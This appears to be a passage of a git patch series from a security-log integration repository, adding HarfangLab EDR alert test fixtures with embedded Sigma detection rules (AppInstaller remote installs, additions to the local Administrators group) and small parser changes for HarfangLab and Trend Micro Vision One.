-p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "event": { + "category": [ + "process" + ], + "dataset": "alert", + "kind": "alert", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-18T09:18:31.558000Z", + "agent": { + "id": "11111111-aaaa-bbbb-cccc-222222222222", + "name": "harfanglab" + }, + "file": { + "hash": { + "md5": "b4e821b2dac20d8d2ac6889f9c3fc315", + "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45" + } + }, + "harfanglab": { + "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c", + "alert_subtype": "process", + "alert_time": "2024-11-18T09:18:31.852+00:00", + "alert_unique_id": "11111111-2222-3333-4444-555555555555", + "execution": 0, + "groups": [ + "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "DOMAINSI", + "hostname": "HOST01", + "name": "HOST01", + "os": { + "full": "Windows 10 Pro", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "HOST01" + }, + "process": { + "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca", + "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "name": "AppInstaller.exe", + "parent": { + "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p", + "executable": "C:\\Windows\\System32\\svchost.exe" + }, + "pe": { + "company": "Microsoft Corporation", + "description": "AppInstaller.exe", + "file_version": "1.24.25180.00000", + "imphash": "714FD4ADFC932C947A3949463867BE18", + "original_file_name": "AppInstaller.exe", + "product": "Microsoft Desktop App Installer" + }, + "pid": 20188, + "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\" + }, + "related": { + "hash": [ + "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45", + "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "b4e821b2dac20d8d2ac6889f9c3fc315" + ], + "hosts": [ + "HOST01" + ], + "user": [ + "DOMAINSI\\JDOE" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "Package Installed via AppInstaller from the Internet" + }, + "url": { + "domain": "url.integration.com", + "original": "https://url.integration.com/test", + "path": "/test", + "port": 443, + "registered_domain": "integration.com", + "scheme": "https", + "subdomain": "url", + "top_level_domain": "com" + }, + "user": { + "name": "DOMAINSI\\JDOE", + "roles": "DOMAIN_Postes_de_travail_Windows" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json new file mode 100644 index 000000000..0f68a7c8c --- /dev/null +++ b/HarfangLab/harfanglab/tests/alert_5.json @@ -0,0 +1,88 @@ +{ + "input": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "event": { + "dataset": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T08:39:14.017000Z", + "action": { + "properties": { + "MemberName": "DOEJ", + "SubjectDomainName": "NT_DOMAIN", + "SubjectLogonId": "0x1234567", + "SubjectUserName": "sw-suser", + "SubjectUserSid": "S-1-2-4-5-6", + "TargetDomainName": "Builtin", + "TargetSid": "S-1-2-3-4", + "TargetUserName": "Administrateurs" + } + }, + "agent": { + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "harfanglab" + }, + "harfanglab": { + "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb", + "alert_subtype": "eventlog", + "alert_time": "2024-11-12T08:39:14.017+00:00", + "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "execution": 0, + "groups": [ + "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}", + "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "NT_DOMAIN", + "hostname": "PC01", + "name": "PC01", + "os": { + "full": "Windows 10 Enterprise", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "PC01" + }, + "organization": { + "id": "3b37ffc8520ef542" + }, + "related": { + "hosts": [ + "PC01" + ], + "user": [ + "sw-suser" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.", + "id": "12345678-abcd-ef90-1234-123456abcdef", + "name": "User Account Added to the Local Administrators Group" + }, + "user": { + "domain": "NT_DOMAIN", + "name": "sw-suser", + "roles": "Postesdetravail,Postesdetravail:Lot3", + "target": { + "domain": "Builtin", + "name": "Administrateurs" + } + } + } +} \ No newline at end of file From ce88fe4040225391a5378a96ae5662a97725203a Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 29 Nov 2024 17:16:26 +0100 Subject: [PATCH 81/84] fix(Harfanglab): add event.kind: 'alert' for harfanglab alerts --- HarfangLab/harfanglab/ingest/parser.yml | 1 + HarfangLab/harfanglab/tests/alert_5.json | 1 + 2 files changed, 2 insertions(+) diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 93671efde..5050c7429 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -229,6 +229,7 @@ stages: alert_info: actions: - set: + event.kind: "alert" harfanglab.level: "{{json_event.message.level}}" rule.description: "{{json_event.message.msg}}" rule.name: "{{json_event.message.rule_name}}" diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json index 0f68a7c8c..19abfe567 100644 --- a/HarfangLab/harfanglab/tests/alert_5.json +++ b/HarfangLab/harfanglab/tests/alert_5.json @@ -12,6 +12,7 @@ "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", "event": { "dataset": "alert", + "kind": "alert", "type": [ "info" ] From a71e4ec1bc766f78582c816d8633d8b733aa7790 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 2 Dec 2024 09:54:25 +0100 Subject: [PATCH 82/84] fix(TrendMicroVisionOne): add action result --- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 1 + .../tests/test_eicar_test_file_detection.json | 1 + 2 files changed, 2 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 0353bb37b..988fe612e 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -37,6 +37,7 @@ stages: rule.id: "{{parsed_event.message.model.modelId}}" event.url: "{{parsed_event.message.model.workbenchLink}}" + event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}" - set: user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json index 5fb30866d..e503353f1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json +++ b/Trend 